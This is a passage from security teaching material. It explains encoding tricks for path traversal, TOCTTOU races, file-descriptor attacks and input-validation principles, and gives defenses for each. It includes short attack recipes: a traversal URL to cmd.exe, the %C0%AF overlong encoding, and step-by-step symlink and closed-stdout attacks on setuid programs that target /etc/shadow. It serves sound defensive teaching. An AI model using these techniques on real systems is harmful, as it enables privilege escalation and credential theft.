Use allowlists for files: If only certain files should be accessible, maintain a list of allowed files and check against it. Path structure becomes irrelevant.

Avoid path concatenation: Instead of concatenating user input to a base directory, use an index or database to map user requests to specific files. The user requests "file_id=42" and the application looks up which file that ID corresponds to. The user never provides the actual path.

Restrict application permissions: Run the application with access only to the directories it needs. Even if path traversal succeeds, the operating system's file permissions prevent accessing sensitive files.


Character Encoding Attacks

Character encoding vulnerabilities arise when applications interpret the same byte sequence in multiple ways. This allows attackers to craft input that passes validation checks but changes meaning when processed.

Unicode IIS vulnerability (2000)

Microsoft IIS had a path traversal check that blocked requests like:

http://example.com/../../system32/cmd.exe

The check happened before URL decoding. An attacker could encode the slash character (/) in ways the check didn't recognize but the decoder would interpret correctly.

UTF-8 overlong encoding

UTF-8 is a character encoding standard that represents characters as one to four bytes. ASCII characters (0-127, which include English letters and common symbols) are represented as single bytes. The UTF-8 standard defines multi-byte representations for characters above 127 (international characters, symbols, emoji).

A slash (/) is character 47, which should be encoded as the single byte 0x2F. The UTF-8 standard requires using the shortest encoding, but many decoders accept longer "overlong" encodings like this two-byte sequence:

1100 0000  1010 1111

In hexadecimal: %C0%AF

The security check saw %C0%AF and didn't recognize it as a path traversal attempt. The URL decoder converted %C0%AF to /, allowing the attack through.

Microsoft initially fixed this by rejecting overlong UTF-8 sequences. However, nested encoding still worked.

Double URL encoding

The percent character itself can be encoded:

Therefore:

If the decoder runs multiple times or processes input in stages, these nested encodings pass through initial checks and become malicious characters after full decoding.

Defense against encoding attacks

Decode first, validate second: All URL decoding, character set conversion, and normalization should happen before security checks, not after.

Normalize input to standard form: Convert input to a single, standardized representation before validating. Reject alternate encodings that represent the same character.

Avoid reinventing parsing: Use well-tested libraries for URL decoding and character encoding. Security vulnerabilities often come from custom parsing logic that handles edge cases incorrectly.

Limit character sets: If an application only needs ASCII, reject any input that contains multi-byte characters or requires special encoding.


Time-of-Check to Time-of-Use (TOCTTOU)

TOCTTOU vulnerabilities are race conditions where the state of a resource changes between a security check and the use of that resource.

The pattern

Consider this common programming pattern:

if (allowed to perform action)
    then perform action

There is a time window between checking permission and performing the action. If an attacker can change the relevant state during this window, the check becomes meaningless.

Classic example: lpr

The lpr command on Unix systems is often a setuid program: a program that runs with the privileges of its owner (root) rather than the user who executes it. This gives it root access to write files into the print spool directory.

The program's logic:

  1. Check if the user has read permission on the file they want to print

  2. If yes, copy the file to the spool directory (using root privileges)

An attacker can exploit the time window between steps 1 and 2:

  1. Create a symbolic link (a file that acts as a pointer to another file) named myfile pointing to a readable file

  2. Run lpr myfile & in the background

  3. Immediately change myfile to point to /etc/shadow (the password file)

  4. If timing is right, lpr checks permissions on the readable file but copies /etc/shadow

The attacker has printed a file they shouldn't have access to.

Temporary file race conditions

Many functions create temporary filenames: tmpnam(), tempnam(), mktemp(), GetTempFileName().

These functions return a filename that is currently unused. The application then creates a file with that name. Between getting the filename and creating the file, an attacker might:

When the application creates or writes to "its" temporary file, it's actually working with the attacker's file.

Defenses against TOCTTOU

Atomic operations: Use operations that combine check and use into a single, uninterruptible action. The mkstemp() function creates and opens a file atomically, preventing the race condition.

int fd = mkstemp(template);  // Creates and opens in one operation

File descriptors, not paths: Once a file is open, the file descriptor refers to the specific file, regardless of what happens to the filename. Operations on the file descriptor are not subject to TOCTTOU on the path.

Avoid checking before use: When possible, attempt the operation and handle failure rather than checking whether it will succeed. This eliminates the time window.

Use locking: For resources that can't be accessed atomically, use locking mechanisms to ensure exclusive access during the check-and-use sequence.


File Descriptor Attacks

POSIX systems assign file descriptors to open files. Three descriptors are special:

Programs assume these exist and use them for console I/O.

The attack

When a program opens a file, the operating system assigns the lowest-numbered unused descriptor. Normally this is 3 or higher since 0-2 are already open.

But if a descriptor is closed, it becomes available. An attacker can close standard output (descriptor 1) before running a setuid program:

./vulnerable_program >&-

The >&- syntax closes standard output.

When the vulnerable program opens a file, the operating system assigns descriptor 1 because it's now available. Any printf() calls, which normally write to standard output, now write to this file instead.

If the program is setuid root and opens a privileged file, the attacker has corrupted that file with printf() output.

Why this works

The vulnerability exists because:

  1. The program assumes descriptors 0-2 are open and valid

  2. Standard library functions like printf() write to descriptor 1 without checking what it refers to

  3. The operating system reuses closed descriptors

Defense

Programs, especially privileged ones, should verify that standard file descriptors are open before using them or opening other files:

// Ensure stdin, stdout, stderr are open
for (int fd = 0; fd <= 2; fd++) {
    if (fcntl(fd, F_GETFD) == -1 && errno == EBADF) {
        // Descriptor is closed; open /dev/null
        open("/dev/null", O_RDWR);
    }
}

This ensures descriptors 0-2 are open before the program performs any file operations.


Input Validation Principles

Input validation defends against all these injection attacks. However, validation is difficult to get right.

Validation approaches

Allowlisting: Specify what is allowed. Accept only characters, patterns, or values that are explicitly permitted. This is the safest approach because unknown inputs are rejected by default.

Example: A username field might accept only lowercase letters, numbers, and underscores, limited to 3-20 characters.

Denylisting: Specify what is forbidden. Reject input that contains dangerous patterns. This is less safe because attackers find bypasses. There are often more ways to encode malicious input than a denylist can anticipate.

Example: Blocking quotes and semicolons in SQL injection prevention fails against encoding attacks and legitimate uses of these characters.

Common validation errors

Incomplete denylists: Attempting to block all dangerous characters or patterns usually fails. Attackers find creative encodings, alternative syntax, or edge cases not covered by the denylist.

Validation order matters: Decode and normalize input before validating. Validating before decoding misses encoded attacks.

Context matters: What's dangerous depends on how input is used. A quote character is dangerous in SQL but harmless in a plain text field. Validation must consider the destination context.

Length limits are not security: Limiting input length is good practice but doesn't prevent injection. A short payload can still contain malicious syntax.

Safer alternatives to validation

Use APIs that separate data from commands: Parameterized queries, prepared statements, and argument arrays prevent interpretation of user input as syntax.

Avoid dynamic command construction: When possible, don't build commands from strings at all. Use fixed command structures with data passed separately.

Normalize before checking: Convert input to its standard form before security checks. All ., .., symbolic links, and encodings should be resolved first.

Minimize trust boundaries: The fewer places untrusted input enters the system, the fewer places that need validation. Validate at entry points and treat everything beyond those points as safe.


Comprehension Errors

Most injection vulnerabilities arise from misunderstandings: programmers don't fully grasp how systems parse and interpret input.

Examples of common misunderstandings:

Complex APIs invite these errors. Consider Windows CreateProcess():

BOOL WINAPI CreateProcess(
  _In_opt_    LPCTSTR               lpApplicationName,
  _Inout_opt_ LPTSTR                lpCommandLine,
  _In_opt_    LPSECURITY_ATTRIBUTES lpProcessAttributes,
  _In_opt_    LPSECURITY_ATTRIBUTES lpThreadAttributes,
  _In_        BOOL                  bInheritHandles,
  _In_        DWORD                 dwCreationFlags,
  _In_opt_    LPVOID                lpEnvironment,
  _In_opt_    LPCTSTR               lpCurrentDirectory,
  _In_        LPSTARTUPINFO         lpStartupInfo,
  _Out_       LPPROCESS_INFORMATION lpProcessInformation
);

A programmer who uses this infrequently is unlikely to understand all security implications of each parameter. They may copy an example from Stack Overflow, tutorial code, or use the output of a large language model without comprehending subtle security properties.

Reducing misunderstandings

Prefer simple, safe APIs: APIs that are hard to misuse reduce errors. Parameterized queries are simpler and safer than manual escaping.

Provide secure examples: Documentation and tutorials should demonstrate secure usage. Insecure examples propagate through copying.

Make insecure options hard to reach: Default behaviors should be secure. Insecure options should require explicit choices and warnings.

Education and code review: Developers need training on platform-specific quirks and common pitfalls. Code review catches mistakes that automated tools miss.


Defense in Depth for Injection Attacks

Like memory vulnerabilities, injection attacks are best defended through layered protections:

1. Input validation at boundaries: Validate all external input at entry points. Use allowlists where possible.

2. Safe APIs: Use parameterized queries, argument arrays, and APIs that separate data from commands.

3. Least privilege: Run programs with minimum necessary privileges. Injection vulnerabilities cause less damage when the compromised process has limited access.

4. Sandboxing: Isolate programs so that even if compromised, they cannot access sensitive resources or execute dangerous operations.

5. Security reviews and testing: Code review and penetration testing find vulnerabilities that other measures miss.

6. Monitoring and logging: Detect exploitation attempts through monitoring for suspicious input patterns and unexpected system behavior.

No single defense is perfect. Defense in depth ensures that bypassing one layer still leaves others in place.